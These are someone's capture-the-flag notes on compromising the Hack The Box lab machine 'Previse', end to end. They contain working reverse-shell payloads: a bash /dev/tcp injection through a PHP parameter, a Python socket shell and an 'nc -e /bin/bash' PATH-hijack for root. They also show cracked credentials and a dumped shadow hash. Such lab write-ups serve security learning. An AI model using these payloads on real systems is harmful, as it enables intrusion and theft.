Quick notes for Previse HTB machine
nmap -sV -sC 10.10.11.104
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-06 22:15 MST
Nmap scan report for 10.10.11.104
Host is up (0.085s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.01 seconds
echo "10.10.11.104 previse.htb" >> /etc/hosts
ffuf -u http://previse.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://previse.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.php [Status: 302, Size: 2801, Words: 737, Lines: 72]
login.php [Status: 200, Size: 2224, Words: 486, Lines: 54]
download.php [Status: 302, Size: 0, Words: 1, Lines: 1]
config.php [Status: 200, Size: 0, Words: 1, Lines: 1]
footer.php [Status: 200, Size: 217, Words: 10, Lines: 6]
header.php [Status: 200, Size: 980, Words: 183, Lines: 21]
favicon.ico [Status: 200, Size: 15406, Words: 15, Lines: 10]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1]
.htaccess [Status: 403, Size: 276, Words: 20, Lines: 10]
. [Status: 302, Size: 2801, Words: 737, Lines: 72]
.html [Status: 403, Size: 276, Words: 20, Lines: 10]
.php [Status: 403, Size: 276, Words: 20, Lines: 10]
status.php [Status: 302, Size: 2968, Words: 749, Lines: 75]
.htpasswd [Status: 403, Size: 276, Words: 20, Lines: 10]
.htm [Status: 403, Size: 276, Words: 20, Lines: 10]
.htpasswds [Status: 403, Size: 276, Words: 20, Lines: 10]
nav.php [Status: 200, Size: 1248, Words: 462, Lines: 32]
accounts.php [Status: 302, Size: 3994, Words: 1096, Lines: 94]
files.php [Status: 302, Size: 4914, Words: 1531, Lines: 113]
.htgroup [Status: 403, Size: 276, Words: 20, Lines: 10]
wp-forum.phps [Status: 403, Size: 276, Words: 20, Lines: 10]
.htaccess.bak [Status: 403, Size: 276, Words: 20, Lines: 10]
.htuser [Status: 403, Size: 276, Words: 20, Lines: 10]
.ht [Status: 403, Size: 276, Words: 20, Lines: 10]
.htc [Status: 403, Size: 276, Words: 20, Lines: 10]
.htaccess.old [Status: 403, Size: 276, Words: 20, Lines: 10]
.htacess [Status: 403, Size: 276, Words: 20, Lines: 10]
:: Progress: [37050/37050] :: Job [1/1] :: 449 req/sec :: Duration: [0:01:20] :: Errors: 1 ::
curl -v -d "username=lanix13&password=mypass&confirm=mypass" http://previse.htb/accounts.php
was able to login and go to the Files tab, there is a siteBackup.zip available for download
mkdir siteBackup
cd siteBackup/
unzip ../siteBackup
Archive: ../siteBackup.zip
inflating: accounts.php
inflating: config.php
inflating: download.php
inflating: file_logs.php
inflating: files.php
inflating: footer.php
inflating: header.php
inflating: index.php
inflating: login.php
inflating: logout.php
inflating: logs.php
inflating: nav.php
inflating: status.php
in the file_logs.php there is something fun
logs.php:$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
curl -v -d "username=lanix133&password=mypass" http://previse.htb/login.php
nc -lnvp 1234
curl -v -b "PHPSESSID=2qvup9fgetiqljd36jieg3gbhl" -d "delim=comma%26/bin/bash+-c+'bash+-i+>+/dev/tcp/10.10.14.10/1234+0>%261'" http://previse.htb/logs.php
I have a basic shell, I wanted to upgrade, usually I can with this but it didn’t work in this case
python -c 'import pty:pty.spawn("/bin/bash")'
So I went ahead and just spawned a new reverse shell using python
nc -lvnp 6666
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
now in this new shell I could run mysql a little better
c -lnvp 6666
listening on [any] 6666 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.104] 51970
bash: cannot set terminal process group (1400): Inappropriate ioctl for device
bash: no job control in this shell
www-data@previse:/var/www/html$ screen -list
screen -list
No Sockets found in /run/screen/S-www-data.
www-data@previse:/var/www/html$ mysql -u root -p < "show databases"
mysql -u root -p < "show databases"
bash: show databases: No such file or directory
www-data@previse:/var/www/html$ mysql -u root -p -e "show databases"
mysql -u root -p -e "show databases"
Enter password: mySQL_p@ssw0rd!:)
Database
information_schema
mysql
performance_schema
previse
sys
www-data@previse:/var/www/html$ mysql -u root -p previse -e "show tables;"
mysql -u root -p previse -e "show tables;"
Enter password: mySQL_p@ssw0rd!:)
Tables_in_previse
accounts
files
www-data@previse:/var/www/html$ mysql -u root -p previse -e "select * from accounts;"
<sql -u root -p previse -e "select * from accounts;"
Enter password: mySQL_p@ssw0rd!:)
id username password created_at
1 m4lwhere $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. 2021-05-27 18:18:36
2 loda123 $1$🧂llol$Nbgpw9CZswqpbpOCvtzzW1 2022-01-07 05:13:23
3 vector $1$🧂llol$V/xv0wMqNEVaOf.LoAuZB1 2022-01-07 05:13:24
4 lanix13 $1$🧂llol$eTC00smlkY12Xcfpgowpq1 2022-01-07 05:29:49
5 bigbose $1$🧂llol$eBQMPwAvz9j9ZpK62qDI// 2022-01-07 05:32:21
6 adrian $1$🧂llol$eBQMPwAvz9j9ZpK62qDI// 2022-01-07 05:48:10
7 lanix133 $1$🧂llol$eTC00smlkY12Xcfpgowpq1 2022-01-07 05:59:04
www-data@previse:/var/www/html$
took the hash for m4lwhere and used hashcat to crack it:
hashcat -m 500 previse.hash /usr/share/wordlists/rockyou.txt
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!
I took that password and m4lwhere and attempted ssh, it worked!
$ ssh m4lwhere@previse.htb
The authenticity of host 'previse.htb (10.10.11.104)' can't be established.
ED25519 key fingerprint is SHA256:BF5tg2bhcRrrCuaeVQXikjd8BCPxgLsnnwHlaBo3dPs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'previse.htb' (ED25519) to the list of known hosts.
m4lwhere@previse.htb's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Jan 7 06:22:56 UTC 2022
System load: 0.07 Processes: 184
Usage of /: 50.5% of 4.85GB Users logged in: 0
Memory usage: 25% IP address for eth0: 10.10.11.104
Swap usage: 0%
0 updates can be applied immediately.
Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
m4lwhere@previse:~$
m4lwhere@previse:~$ cat user.txt
ae1**************************
m4lwhere@previse:~$ sudo -l
User m4lwhere may run the following commands on previse:
(root) /opt/scripts/access_backup.sh
m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
cd /var/shm
echo "nc 10.10.14.10 5555 -e /bin/bash" > gzip
nc -lvnp 5555
export PATH=/dev/shm:$PATH
sudo /opt/scripts/access_backup.sh
listening on [any] 5555 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.104] 59622
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
root.txt
cat root.txt
6e2c7***************
and final proof:
cat /etc/shadow
root:$6$QJgW9tG2$yIhp0MQm9b4ok8j9su9H0hJ.GuwI5AHusMrZBQv2oLfvotY5YR0MJ82zJ4xi5WCKQSWn/a3HO/M/TjS/YC0Mk1:18824:0:99999:7:::